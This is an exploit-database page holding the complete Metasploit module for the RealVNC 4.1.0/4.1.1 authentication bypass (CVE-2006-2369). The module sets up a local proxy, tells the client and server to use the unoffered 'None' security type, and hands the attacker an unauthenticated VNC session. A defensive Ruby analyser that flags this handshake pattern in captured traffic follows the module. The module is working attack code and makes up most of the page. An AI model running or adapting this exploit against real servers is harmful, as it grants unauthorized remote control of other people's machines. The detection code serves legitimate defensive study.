RealVNC Authentication Bypass

Published: 26 Aug 2011 00:00:00 | Reported by: metasploit | Type: zdt | Source: 0day.today | Views: 30

RealVNC Authentication Bypass in versions 4.1.0 and 4.1.1. The module sets up a proxy listener on LPORT and proxies connections to the target server, exploiting an authentication bypass vulnerability in the RFB security negotiation.

Related

Reporter | Title | Published | Family
GithubExploit | Exploit for Improper Authentication in Vnc Realvnc | 8 Mar 2026 08:00 | githubexploit
Circl | CVE-2006-2369 | 26 Aug 2011 00:00 | circl
Check Point Advisories | RealVNC Password Authentication Bypass (CVE-2006-2369) | 25 May 2006 00:00 | checkpoint_advisories
CVE | CVE-2006-2369 | 15 May 2006 16:00 | cve
Cvelist | CVE-2006-2369 | 15 May 2006 16:00 | cvelist
Debian CVE | CVE-2006-2369 | 15 May 2006 16:00 | debiancve
Exploit DB | RealVNC - Authentication Bypass (Metasploit) | 26 Aug 2011 00:00 | exploitdb
Exploit DB | RealVNC 4.1.0/4.1.1 - Authentication Bypass | 13 May 2012 00:00 | exploitdb
exploitpack | RealVNC 4.1.0/4.1.1 - Authentication Bypass | 13 May 2012 00:00 | exploitpack
Tenable Nessus | FreeBSD : vnc -- authentication bypass vulnerability (4645b98c-e46e-11da-9ae7-00123fcc6e5c) | 19 May 2006 00:00 | nessus

Code
##
# $Id: realvnc_41_bypass.rb 13641 2011-08-26 04:40:21Z bannedit $
##
 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
 
class Metasploit3 < Msf::Auxiliary
    include Msf::Exploit::Remote::Tcp
     
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'RealVNC Authentication Bypass',
            'Description'    => %q{
                This module exploits an Authentication Bypass Vulnerability
                in RealVNC Server version 4.1.0 and 4.1.1. It sets up a proxy
                listener on LPORT and proxies to the target server
 
                The AUTOVNC option requires that vncviewer be installed on
                the attacking machine. This option should be disabled for Pro
            },
            'Author'         =>
                [
                    'hdm', #original msf2 module
                    'TheLightCosine <thelightcosine[at]gmail.com>'
                ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 13641 $',
            'References'     =>
                [
                    ['BID', '17978'],
                    ['OSVDB', '25479'],
                    ['URL', 'http://secunia.com/advisories/20107/'],
                    ['CVE', 'CVE-2006-2369'],
                ],
            'DisclosureDate' => 'May 15 2006'))
 
        register_options(
            [
                OptAddress.new('RHOST', [true, 'The Target Host']),
                OptPort.new('RPORT',    [true, "The port the target VNC Server is listening on", 5900 ]),
                OptPort.new('LPORT',    [true, "The port the local VNC Proxy should listen on", 5900 ]),
                OptBool.new('AUTOVNC',  [true, "Automatically Launch vncviewer from this host", true])
            ], self.class)
    end
 
    def run
        #starts up the Listener Server
        print_status("starting listener")
        listener = Rex::Socket::TcpServer.create(
                'LocalHost' => '0.0.0.0',
                'LocalPort' => datastore['LPORT'],
                'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
            )
 
        #If the AUTOVNC option is set to true this will spawn a vncviewer on the local machine
        #targeting the proxy listener.
        if (datastore['AUTOVNC'])
            unless (check_vncviewer())
                print_error("vncviewer does not appear to be installed, exiting!!!")
                return nil
            end
            print_status("Spawning viewer thread") 
            view = framework.threads.spawn("VncViewerWrapper", false) {
                    system("vncviewer 127.0.0.1::#{datastore['LPORT']}")
            }
        end
 
        #Establishes the connection between the viewer and the remote server
        client = listener.accept
        add_socket(client)
 
        s = Rex::Socket::Tcp.create(
                'PeerHost' => datastore['RHOST'],
                'PeerPort' => datastore['RPORT'],
                'Timeout' => 1
                )
        add_socket(s)
        serverhello = s.gets
        if serverhello.nil?
            print_error("No RFB protocol version received from the server")
            return
        end
        unless serverhello.include? "RFB 003.008"
            print_error("The VNC Server is not vulnerable")
            return
        end
 
        #MitM attack on the VNC Authentication Process
        client.puts(serverhello)
        clienthello = client.gets
        s.puts(clienthello)
        authmethods = s.recv(2)
        print_status("Auth Methods Received. Sending Null Authentication Option to Client")
        client.write("\x01\x01")
        client.recv(1)
        s.write("\x01")
        s.recv(4)
        client.write("\x00\x00\x00\x00")
 
        #handles remaining proxy operations between the two sockets
        closed = false
        while(closed == false)
            sockets =[]
            sockets << client
            sockets << s
            selected = select(sockets,nil,nil,0)
            #print_status ("Selected: #{selected.inspect}")
            unless selected.nil?
                if selected[0].include?(client)
                    #print_status("Transfering from client to server")
                    begin
                        data = client.sysread(8192)
                        if data.nil?
                            print_error("Client Closed Connection")
                            closed = true
                        else
                            s.write(data)
                        end
                    rescue
                        print_error("Client Closed Connection")
                        closed = true
                    end
                end
                if selected[0].include?(s)
                    #print_status("Transfering from server to client")
                    begin
                        data = s.sysread(8192)
                        if data.nil?
                            print_error("Server Closed Connection")
                            closed = true
                        else
                            client.write(data)
                        end
                    rescue
                        closed = true
                    end
                end
            end
        end
 
        #Garbage Collection
        s.close
        client.close
        print_status("Listener Closed")
 
        if (datastore['AUTOVNC'])
            view.kill
            print_status("Viewer Closed")
        end
    end
 
    def check_vncviewer
        vnc =
            Rex::FileUtils::find_full_path('vncviewer') ||
            Rex::FileUtils::find_full_path('vncviewer.exe')
        if (vnc)
            return true
        else
            return false
        end
    end
end
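The module above works entirely at the RFB 3.8 security-negotiation step: the server advertises its supported security types (the two bytes read into authmethods), the module answers the server with type 1 (None) even though only VNC Authentication was offered, and a vulnerable server replies with a successful SecurityResult. The following Ruby is an added example, not part of the Metasploit module or of RealVNC, that parses that handshake from a defender's side: it flags a negotiation in which the client selected a type the server never offered and the server still reported success, and it shows the server-side acceptance check (server_should_accept?) whose absence is the bug. The sample exchanges at the bottom are constructed byte strings, not captured traffic.

```ruby
# RFB 3.8 security handshake, after the "RFB 003.008" version exchange:
#   server -> client : <count:1><type:1>...        supported security types
#   client -> server : <type:1>                    the type the client selects
#   (type-specific sub-protocol, e.g. the VNC Authentication challenge/response)
#   server -> client : <SecurityResult:4, big-endian>   0 = OK, 1 = failed
# A conforming server must refuse a selected type it did not offer.

RFB_SEC_TYPE_NAMES = { 0 => 'Invalid', 1 => 'None', 2 => 'VNC Authentication' }.freeze
RFB_SEC_NONE = 1

# Parse the server's security-types message into the list of offered types.
# A count of 0 means the server refused the connection (a reason string follows).
def parse_server_security_types(msg)
  raise ArgumentError, 'empty security-types message' if msg.nil? || msg.empty?
  count = msg.getbyte(0)
  return [] if count.zero?
  raise ArgumentError, 'truncated security-types message' if msg.bytesize < 1 + count
  msg.byteslice(1, count).bytes
end

# The server-side check RealVNC 4.1.0/4.1.1 lacked: accept only an offered type.
def server_should_accept?(offered_types, chosen_type)
  offered_types.include?(chosen_type)
end

# Analyse one negotiation (server offer, client choice, server result) and
# return a finding hash. :unadvertised_type is set when the client picked a
# type the server never offered; :bypass is set when the server nevertheless
# reported success, which is the CVE-2006-2369 pattern.
def analyze_security_negotiation(server_msg, client_choice, security_result)
  offered = parse_server_security_types(server_msg)
  chosen  = client_choice.getbyte(0)
  result  = security_result.unpack1('N')
  unadvertised = !server_should_accept?(offered, chosen)
  {
    offered:           offered,
    chosen:            chosen,
    chosen_name:       RFB_SEC_TYPE_NAMES.fetch(chosen, "type #{chosen}"),
    result_ok:         result.zero?,
    unadvertised_type: unadvertised,
    downgrade_to_none: unadvertised && chosen == RFB_SEC_NONE,
    bypass:            unadvertised && result.zero?,
  }
end

# One-line summary suitable for a log entry or alert.
def describe_finding(f)
  offered = f[:offered].map { |t| RFB_SEC_TYPE_NAMES.fetch(t, "type #{t}") }.join(', ')
  status = f[:bypass] ? 'BYPASS' : (f[:unadvertised_type] ? 'REJECTED' : 'normal')
  "#{status}: server offered [#{offered}], client chose #{f[:chosen_name]}, " \
    "result #{f[:result_ok] ? 'OK' : 'failed'}"
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample exchanges (not captured traffic).
  # 1. Vulnerable server: offers only VNC Authentication, client selects None, server says OK.
  puts describe_finding(analyze_security_negotiation("\x01\x02".b, "\x01".b, "\x00\x00\x00\x00".b))
  # 2. Fixed server: same client choice, but the unadvertised type is refused.
  puts describe_finding(analyze_security_negotiation("\x01\x02".b, "\x01".b, "\x00\x00\x00\x01".b))
  # 3. Legitimate session: client picks the offered VNC Authentication type.
  puts describe_finding(analyze_security_negotiation("\x01\x02".b, "\x02".b, "\x00\x00\x00\x00".b))
end
```

The three pieces passed to analyze_security_negotiation are exactly the bytes the module reads and writes at that step (the server's type list, the single selection byte, and the 4-byte SecurityResult), so the same function can be fed from a packet capture of port 5900 traffic to confirm whether a server that still announces RFB 003.008 honours its own security-type list.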



#  0day.today [2018-01-02]  #


Current version: 26 Aug 2011 00:00
Vulners AI Score: 7.1 (High risk)
EPSS: 0.92336
Views: 30